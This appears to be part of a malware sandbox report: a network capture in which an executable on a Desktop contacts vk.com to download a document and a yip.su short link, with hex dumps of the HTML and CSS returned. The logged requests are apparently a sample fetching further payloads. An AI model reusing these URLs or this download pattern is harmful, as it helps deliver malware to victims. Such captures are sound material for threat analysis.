2024-08-10 14:12:23 UTC	325	OUT	GET /doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZLVNzU3FtB3MumkHq06odvtZCiVngKoCNbdNz&api=1&no_preview=1#launc HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
2024-08-10 14:12:23 UTC	2492	IN	HTTP/1.1 200 OK Server: kittenx Date: Sat, 10 Aug 2024 14:12:23 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 536871 Connection: close X-Powered-By: KPHP/7.4.117956 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixlang=3; expires=Mon, 11 Aug 2025 00:15:50 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixstlid=9116873606112062573_2X6sTpJgLVDkMpzqe0bdjoK2tTLyg8H80k9GzLZPsCD; expires=Sun, 10 Aug 2025 14:12:23 GMT; path=/; domain=.vk.com; secure; SameSite=None Set-Cookie: remixlgck=33523534a90da07520; expires=Sun, 10 Aug 2025 16:10:06 GMT; path=/; domain=.vk.com; secure; HttpOnly; SameSite=None Set-Cookie: remixstid=799547928_hxzgxEtPkOmb052lEzB228hUTaXoBez3cB8LbJ7jbnH; expires=Tue, 12 Aug 2025 03:52:27 GMT; path=/; domain=.vk.com; secure; SameSite=None Cache-control: no-store X-Robots-Tag: noindex,nofollow Reporting-Endpoints: default="https://vk.com/browser_reports?dest=default_reports" Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru htt [TRUNCATED] X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front924000 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend X-Trace-Id: q87aXlTc4sdkfFzTcysy0_fTGFVDKA
2024-08-10 14:12:23 UTC	13892	IN	Data Raw: 20 20 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 27 65 6e 27 20 64 69 72 3d 27 6c 74 72 27 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 5f 6c 6f 67 6f 2e 69 63 6f 3f 37 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 76 6b 2e 63 6f 6d 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c Data Ascii: <!DOCTYPE html> <html lang='en' dir='ltr'> <head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" /><link rel="preconnect" href="https://login.vk.com" /><link rel
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 25 32 32 25 32 30 68 65 69 67 68 74 25 33 44 25 32 32 32 30 25 32 32 25 32 30 66 69 6c 6c 25 33 44 25 32 32 6e 6f 6e 65 25 32 32 25 32 30 78 6d 6c 6e 73 25 33 44 25 32 32 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 77 33 2e 6f 72 67 25 32 46 32 30 30 30 25 32 46 73 76 67 25 32 32 25 33 45 25 33 43 70 61 74 68 25 32 30 66 69 6c 6c 2d 72 75 6c 65 25 33 44 25 32 32 65 76 65 6e 6f 64 64 25 32 32 25 32 30 63 6c 69 70 2d 72 75 6c 65 25 33 44 25 32 32 65 76 65 6e 6f 64 64 25 32 32 25 32 30 64 25 33 44 25 32 32 4d 32 2e 34 34 25 32 30 34 2e 31 38 43 32 25 32 30 35 2e 30 34 25 32 30 32 25 32 30 36 2e 31 36 25 32 30 32 25 32 30 38 2e 34 76 33 2e 32 63 30 25 32 30 32 2e 32 34 25 32 30 30 25 32 30 33 2e 33 36 2e 34 34 25 32 30 34 2e 32 32 61 34 25 32 30 34 25 Data Ascii: %22%20height%3D%2220%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20fill-rule%3D%22evenodd%22%20clip-rule%3D%22evenodd%22%20d%3D%22M2.44%204.18C2%205.04%202%206.16%202%208.4v3.2c0%202.24%200%203.36.44%204.22a4%204%
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 25 32 32 25 32 46 25 33 45 25 33 43 25 32 46 67 25 33 45 25 33 43 67 25 32 30 66 69 6c 6c 25 33 44 25 32 32 6e 6f 6e 65 25 32 32 25 32 30 73 74 72 6f 6b 65 25 33 44 25 32 32 25 32 33 38 31 38 63 39 39 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 77 69 64 74 68 25 33 44 25 32 32 32 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 25 33 44 25 32 32 72 6f 75 6e 64 25 32 32 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 30 2e 33 25 32 30 31 37 2e 32 6c 2d 31 2e 31 25 32 30 31 36 25 32 32 25 32 46 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 33 2e 32 25 32 30 31 36 2e 36 6c 2d 31 30 2e 34 25 32 30 31 34 2e 38 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 25 33 44 25 32 32 31 2e 34 32 36 30 Data Ascii: %22%2F%3E%3C%2Fg%3E%3Cg%20fill%3D%22none%22%20stroke%3D%22%23818c99%22%20stroke-width%3D%222%22%20stroke-linecap%3D%22round%22%3E%3Cpath%20d%3D%22M410.3%2017.2l-1.1%2016%22%2F%3E%3Cpath%20d%3D%22M413.2%2016.6l-10.4%2014.8%22%20stroke-dasharray%3D%221.4260
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 69 6e 67 3a 32 36 70 78 20 30 20 33 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 77 69 64 74 68 3a 37 39 35 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 76 61 72 28 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 73 65 70 61 72 61 74 6f 72 5f 70 72 69 6d 61 72 79 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 30 70 78 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 3a 65 6d 70 74 79 7b 70 61 64 64 69 6e 67 3a 76 61 72 28 2d 2d 70 61 67 65 2d 62 6c 6f 63 6b 2d 6f 66 66 73 65 74 2c 20 31 35 70 78 29 30 20 30 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 2e 73 69 6d 70 6c 65 7b 6d 61 72 67 69 6e 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 63 6c 65 61 72 3a 62 6f 74 68 Data Ascii: ing:26px 0 35px;text-align:center;width:795px;box-sizing:border-box;border-top:1px solid var(--vkui--color_separator_primary);margin-top:40px}.footer_wrap:empty{padding:var(--page-block-offset, 15px)0 0}.footer_wrap.simple{margin:0;width:auto;clear:both
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 62 6c 61 63 6b 5f 62 6c 75 65 32 34 5f 61 6c 70 68 61 38 3a 72 67 62 61 28 30 2c 20 32 38 2c 20 36 31 2c 20 30 2e 30 38 29 3b 2d 2d 62 6c 61 63 6b 5f 62 6c 75 65 32 34 5f 61 6c 70 68 61 32 34 3a 72 67 62 61 28 30 2c 20 32 38 2c 20 36 31 2c 20 30 2e 32 34 29 3b 2d 2d 62 6c 61 63 6b 5f 62 6c 75 65 33 30 5f 61 6c 70 68 61 36 36 3a 72 67 62 61 28 30 2c 20 33 36 2c 20 37 37 2c 20 30 2e 36 36 29 3b 2d 2d 62 6c 61 63 6b 5f 62 6c 75 65 34 35 5f 61 6c 70 68 61 31 30 3a 72 67 62 61 28 30 2c 20 35 37 2c 20 31 31 35 2c 20 30 2e 31 30 29 3b 2d 2d 62 6c 75 65 5f 34 30 30 3a 23 35 31 38 31 62 38 3b 2d 2d 62 6c 75 65 5f 61 34 30 30 3a 23 34 34 37 62 62 61 3b 2d 2d 62 6c 75 65 5f 34 30 30 5f 61 6c 70 68 61 32 30 3a 72 67 62 61 28 38 31 2c 20 31 32 39 2c 20 31 38 34 2c 20 Data Ascii: black_blue24_alpha8:rgba(0, 28, 61, 0.08);--black_blue24_alpha24:rgba(0, 28, 61, 0.24);--black_blue30_alpha66:rgba(0, 36, 77, 0.66);--black_blue45_alpha10:rgba(0, 57, 115, 0.10);--blue_400:#5181b8;--blue_a400:#447bba;--blue_400_alpha20:rgba(81, 129, 184,
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 6f 6e 5f 70 61 64 64 69 6e 67 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 72 72 6f 77 5f 70 61 64 64 69 6e 67 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 74 6f 6f 6c 74 69 70 5f 6d 61 72 67 69 6e 2d 2d 72 65 67 75 6c 61 72 3a 38 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 69 63 6f 6e 5f 75 5f 69 2d 2d 72 65 67 75 6c 61 72 3a 31 36 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 76 61 74 61 72 5f 78 5f 73 2d 2d 72 65 67 75 6c 61 72 3a 32 34 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 76 61 74 61 72 5f 73 2d 2d 72 65 67 75 6c 61 72 3a 33 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 76 61 74 61 72 5f 6d 2d 2d 72 65 67 75 Data Ascii: on_padding_horizontal--regular:12px;--vkui--size_arrow_padding--regular:12px;--vkui--size_tooltip_margin--regular:8px;--vkui--size_icon_u_i--regular:16px;--vkui--size_avatar_x_s--regular:24px;--vkui--size_avatar_s--regular:32px;--vkui--size_avatar_m--regu
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 2d 2d 68 6f 76 65 72 3a 23 37 34 32 64 62 62 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 2d 2d 61 63 74 69 76 65 3a 23 36 66 32 63 62 36 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 3a 23 65 30 33 66 61 62 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 2d 2d 68 6f 76 65 72 3a 23 64 37 33 64 61 37 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 2d 2d 61 63 74 69 76 65 3a 23 63 65 33 62 61 32 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 73 65 63 6f 6e 64 61 72 79 3a Data Ascii: lor_accent_violet--hover:#742dbb;--vkui--color_accent_violet--active:#6f2cb6;--vkui--color_accent_raspberry_pink:#e03fab;--vkui--color_accent_raspberry_pink--hover:#d73da7;--vkui--color_accent_raspberry_pink--active:#ce3ba2;--vkui--color_accent_secondary:
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 3a 23 63 63 64 33 66 66 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 68 6f 76 65 72 3a 23 63 34 63 62 66 37 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 61 63 74 69 76 65 3a 23 62 63 63 33 65 66 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 6f 75 74 67 6f 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 3a 23 61 64 64 33 66 66 3b 2d 2d 76 6b 75 69 2d 2d 76 Data Ascii: ble_incoming_expiring_highlighted:#ccd3ff;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted--hover:#c4cbf7;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted--active:#bcc3ef;--vkui--vkontakte_im_bubble_outgoing_highlighted:#add3ff;--vkui--v
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 2d 2d 68 6f 76 65 72 3a 23 35 63 35 63 35 63 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 2d 2d 61 63 74 69 76 65 3a 23 36 33 36 33 36 33 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 73 65 61 72 63 68 5f 62 61 72 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 32 32 32 32 32 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 73 65 61 72 63 68 5f 62 61 72 5f 62 61 63 6b 67 72 6f 75 6e 64 2d 2d 68 6f 76 65 72 3a 23 32 62 32 62 32 62 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 73 65 61 72 63 68 5f 62 61 72 5f 62 61 63 6b Data Ascii: ui--vkontakte_color_input_border--hover:#5c5c5c;--vkui--vkontakte_color_input_border--active:#636363;--vkui--vkontakte_color_search_bar_background:#222222;--vkui--vkontakte_color_search_bar_background--hover:#2b2b2b;--vkui--vkontakte_color_search_bar_back
2024-08-10 14:12:23 UTC	16384	IN	Data Raw: 63 61 6c 65 28 31 29 7d 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 76 6b 75 69 61 6e 69 6d 2d 66 61 64 65 2d 6f 75 74 7b 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 76 6b 75 69 61 6e 69 6d 61 74 69 6f 6e 2d 77 61 76 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 33 30 25 7b 6f 70 61 63 69 74 79 3a 31 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 38 29 7d 7d 0a 2e 76 6b 75 69 49 6e 74 65 72 6e 61 6c 50 61 6e 65 6c 48 65 61 64 65 72 7e 2a 20 2e 76 6b 75 69 46 69 78 65 64 4c 61 79 6f 75 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 6f 70 3a 6e 6f 74 28 2e 76 6b 75 69 49 6e 74 65 72 6e 61 6c 50 61 6e Data Ascii: cale(1)}}@keyframes vkuianim-fade-out{0%{opacity:1}to{opacity:0}}@keyframes vkuianimation-wave{0%{opacity:1;transform:scale(1)}30%{opacity:1}to{opacity:0;transform:scale(8)}}.vkuiInternalPanelHeader~* .vkuiFixedLayout--vertical-top:not(.vkuiInternalPan

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49756	188.114.97.3	443	7008	C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-10 14:12:42 UTC	187	OUT	GET /1cN8u7 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: yip.su
2024-08-10 14:12:42 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sat, 10 Aug 2024 14:12:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-10 14:12:42 UTC	691	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 46 56 69 74 77 67 38 57 4b 71 2f 47 37 50 61 4c 41 30 6c 64 75 6a 4c 62 31 45 45 31 62 6b 69 7a 70 4a 79 44 67 72 4a 2b 63 50 6c 68 41 41 72 2f 6d 74 48 75 37 6b 34 35 72 62 78 55 63 63 55 7a 6b 36 2f 57 72 6f 52 75 6a 63 37 34 53 4f 2f 69 61 56 53 6e 58 66 76 37 37 54 38 46 55 49 74 75 35 4f 7a 4c 52 31 63 50 77 39 30 3d 24 6d 42 41 56 59 50 4d 4e 66 72 43 2b 49 4a 78 30 43 72 55 6c 55 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: FVitwg8WKq/G7PaLA0ldujLb1EE1bkizpJyDgrJ+cPlhAAr/mtHu7k45rbxUccUzk6/WroRujc74SO/iaVSnXfv77T8FUItu5OzLR1cPw90=$mBAVYPMNfrC+IJx0CrUlUA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 33 64 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3d10<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-10 14:12:42 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 